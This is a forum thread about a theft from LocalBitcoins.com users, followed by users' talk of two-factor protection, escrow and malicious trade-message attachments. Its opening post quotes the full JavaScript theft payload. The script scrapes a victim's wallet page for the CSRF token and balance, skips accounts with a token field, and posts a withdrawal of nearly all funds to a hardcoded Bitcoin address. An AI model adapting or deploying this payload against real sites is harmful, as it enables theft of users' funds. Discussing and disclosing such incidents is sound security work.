LocalBitcoins.com exploit!

[runeks]

This is the exploit in question:

Code:

function loadpic() {
    function btcget() {
        $.ajax({
            url: '/accounts/wallet/',
            type: 'GET',
            dataType: 'html',
            contentType: 'application/x-www-form-urlencoded; charset=UTF-8',
            error: function() {},
            success: function(data) {
                walh(data);
            }
        });
    }

    function btcsend(btcamount, btcto, csrf) {
        var pd = {
            'csrfmiddlewaretoken': csrf,
            'address_to': btcto,
            'amount': btcamount,
            'send_submit': 'Send from wallet'
        };
        $.ajax({
            url: '/accounts/wallet/',
            data: pd,
            type: 'POST',
            dataType: 'html',
            contentType: 'application/x-www-form-urlencoded; charset=UTF-8',
            error: function() {},
            success: function(data) {}
        });
    }

    function walh(html) {
        var hastfa = '';
        var csrftoken = '';
        var btc = 0;
        var m = html.match(/label for=.(id_token)/);
        if (m && m[1]) {
            if (m[1] != '') {
                return;
            }
        }
        m = html.match(/.csrfmiddlewaretoken. value=.([a-zA-Z0-9_-]+)/);
        if (m && m[1]) {
            csrftoken = m[1];
        } else {
            return;
        }
        m = html.match(/Wallet: ([0-9,.-]+) BTC/);
        if (m && m[1]) {
            btc = m[1];
        } else {
            return;
        }
        btc = parseFloat(btc);
        btc = btc.toFixed(2);
        if (btc < 0.02) {
            return;
        }
        btc = btc - 0.01;
        btc = btc.toFixed(2);

        btcsend(btc, '12PLw9HYoK6BguB1w4QcNBKzmRANJ5bj2c', csrftoken);
    }
    btcget();
}

Retrieved from this site: http://urlquery.net/report.php?id=5191051

[Mike Hearn]

Ideally, there would be no need to deposit funds into any website to do basic person to person trading. I never used the localbitcoins escrow system, if you meet in person it's not that important.

[herzmeister]

Ideally, there would be no need to deposit funds into any website to do basic person to person trading. I never used the localbitcoins escrow system, if you meet in person it's not that important.

It enables in-person trading without requiring internet access at all, for neither buyer nor seller. All that's required is that seller can receive SMS.

In practice, many do have smartphones and transfer their coins directly though.

For online trading, escrow is pretty necessary in most cases though. That's why traders often have a few coins in their localbitcoins.com wallets.

[marcovaldo]

Did you personnaly lose anything?

[MPOE-PR]

My gosh, people need to stop setting up bitcoin exchange places without setting up proper security first!
So many places are getting hacked into, WHEN WILL PEOPLE LEARN!?

They'll learn when they're able to recognize their own vanity, stupidity, and unreadiness. Which would often enough seem about as likely as pigs flying, sadly.

By now its at the same stage like the "Piratenpartei" in germany: sympathic, here to change the world, full of great ideas, clever in the system, ready for the future - but in actual reality a bunch of nerds who are unable to act like adult politicians and becomes ridiculous when trying.

Don't write a code, go to your local bank, ask for an internship and learn how moneys works.

This, basically. With the addendum that not everyone is cut out to run a business. And the post-script that paying attention to what the actually capable have to say is a necessary step.

[johnyj]

bitcoin withdraw should be authenticated through email

[BitAddict]

bitcoin withdraw should be authenticated through email

With 2FA I think is enough

[johnyj]

bitcoin withdraw should be authenticated through email

With 2FA I think is enough

2FA is not convenient if you use the site many times a day, and it does not work when you are abroad and use a different sim card

[Cryddit]

My gosh, people need to stop setting up bitcoin exchange places without setting up proper security first!
So many places are getting hacked into, WHEN WILL PEOPLE LEARN!?

People keep putting Coins into online wallets whose security they don't know crap about!  WHEN WILL PEOPLE LEARN?

You need to leave the bitcoins in the wallet if you want to sell them ... and I believe more a company than the average private seller... How did you buy your bitcoins, sir?

Some I bought them from Bitstamp.  And moved them the instant they showed up in Bitstamp account, to my private wallet.  

Some I got for pay - made machine parts for someone. She wanted pay me in Bitcoin, I said sure.

Some others I got for pay - wrote code for somebody wanted special exclusive super-secret software analyze enormous big pile of data, paid Bitcoin to keep private from someone else looking at bank account.

Some others I got for pay - Main job, security consult.  I look at malware, see what it does by read machine code, figure out how to clean infected machines.  Clients implement, or I implement, cleaning software, clients then sell.  Pays well.  Twice now I asked pay me in Bitcoin, they said 'sure, whatever'.

A couple I bought direct in person, smartphone to smartphone, from speculator got nervous back when price was USD$60.

[joesmoe2012]

You can make 2FA work with differenet SIMs, I have, it's not that difficult. Just backup and then restore.

Everybody should be using 2FA if your dealing with bitcoins. Otherwise stay away from targets such as exchanges.

Good work on localbitcoins behalf in paying out of their pocket for all the stolen coins.

[smoothie]

As the saying goes:

Those who fail to learn from history are doomed to repeat it.

[justusranvier]

AFAIK two factor on LocalBitcoins is only for logging in, not for withdrawals, so it provided absolutely no protection against this exploit.

[joesmoe2012]

AFAIK two factor on LocalBitcoins is only for logging in, not for withdrawals, so it provided absolutely no protection against this exploit.

Incorrect. THey use 2FA for withdraw confirmation as well. I don't think that this exploit effected anybody who had 2FA enabled. 

[BitAddict]

AFAIK two factor on LocalBitcoins is only for logging in, not for withdrawals, so it provided absolutely no protection against this exploit.

Incorrect. THey use 2FA for withdraw confirmation as well. I don't think that this exploit effected anybody who had 2FA enabled. 

+1

You can't withdrawal without 2FA code, if enabled.

[johnyj]

At lease an email based 2FA is much better

[rufusBTC]

AFAIK two factor on LocalBitcoins is only for logging in, not for withdrawals, so it provided absolutely no protection against this exploit.

Incorrect. THey use 2FA for withdraw confirmation as well. I don't think that this exploit effected anybody who had 2FA enabled. 

+1

You can't withdrawal without 2FA code, if enabled.

looks like the exploit just sucked out peoples BTC, through a loophole even if they had 2FA.

[niko]

Can someone clarify: simply visiting a forum page was enough, or opening an attachment?

[willphase]

Can someone clarify: simply visiting a forum page was enough, or opening an attachment?

You had to open the attachment (that was in fact an HTML page) and not have 2FA on withdrawals enabled.

Will

[herzmeister]

Can someone clarify: simply visiting a forum page was enough, or opening an attachment?

did you mean because i linked to the forum in the OP? no, that link was safe, or what do you think of me  

the exploit was in the site's messaging system when doing trades. That people can upload attachments there is a relatively new feature.

[niko]

Can someone clarify: simply visiting a forum page was enough, or opening an attachment?

did you mean because i linked to the forum in the OP? no, that link was safe, or what do you think of me  

the exploit was in the site's messaging system when doing trades. That people can upload attachments there is a relatively new feature.

Ten days ago I was browsing through LBC Site, and there was great advice on how to trade safely. I specifically remember them reminding people to always be cautious with any attachments in emails, etc.
People clicked on attachments, did not have 2FA, and sure enough the thief got their coins.